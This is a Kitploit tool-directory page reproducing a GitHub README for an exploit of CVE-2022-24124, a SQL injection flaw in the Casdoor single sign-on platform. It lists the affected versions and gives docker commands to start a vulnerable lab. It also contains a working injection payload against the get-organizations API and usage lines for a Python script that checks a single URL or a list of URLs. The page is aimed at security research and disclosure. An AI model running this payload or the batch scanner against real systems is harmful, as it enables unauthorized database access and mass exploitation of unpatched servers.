Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-24124 — CVE-2022-24124 exploit | Kitploit
Tools/GitHubGitHub/b1gdog/cve-2022-24124
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubb1gdog/cve-2022-24124

CVE-2022-24124

CVE-2022-24124 exploit

View Repository
223 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Preface

Casdoor is a centralized single sign-on (SSO) authentication platform based on OAuth 2.0/OIDC


ID

CVE ID: CVE-2022-24124

CNPD ID: CNPD-202201-7304


Affected Versions

Severity: High (7.5 HIGH)

POC/EXP: Publicly available

Casdoor < Casdoor 1.13.1 // All versions before 1.13.1 are affected


Vulnerability Description

This vulnerability is an SQL injection vulnerability. The query API has an SQL injection vulnerability related to the field and value parameters, as shown in api/get-organizations.


Reproduction

Pull the vulnerable image

docker pull vulfocus/casdoor:1.13.0

Pull docker

Start the vulnerable environment

docker run -itd -p 8000:8000 -it -d vulfocus/casdoor:1.13.0

dockerRun

Open the vulnerable environment page

http

Use POC to construct payload

POC: /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)

1661963474975


One-Click Verification Script

Disclaimer: This tool is only for security research or authorized penetration testing. Users are solely responsible for any illegal use. The author assumes no liability or responsibility.

root@kitploit:~
python3 CVE-2022-24124.py -h

image

root@kitploit:~
python3 CVE-2022-24124.py -u http://127.0.0.1

image

root@kitploit:~
python3 CVE-2022-24124.py -f urls.txt

image


Related Information

https://nvd.nist.gov/vuln/detail/CVE-2022-24124

https://github.com/ColdFusionX/CVE-2022-24124

https://github.com/0xAbbarhSF/CVE-2022-24124

Reference: https://www.t00ls.com/thread-66989-1-1.html

I wrote a Python version as a practice and added a batch detection feature.

Download Tool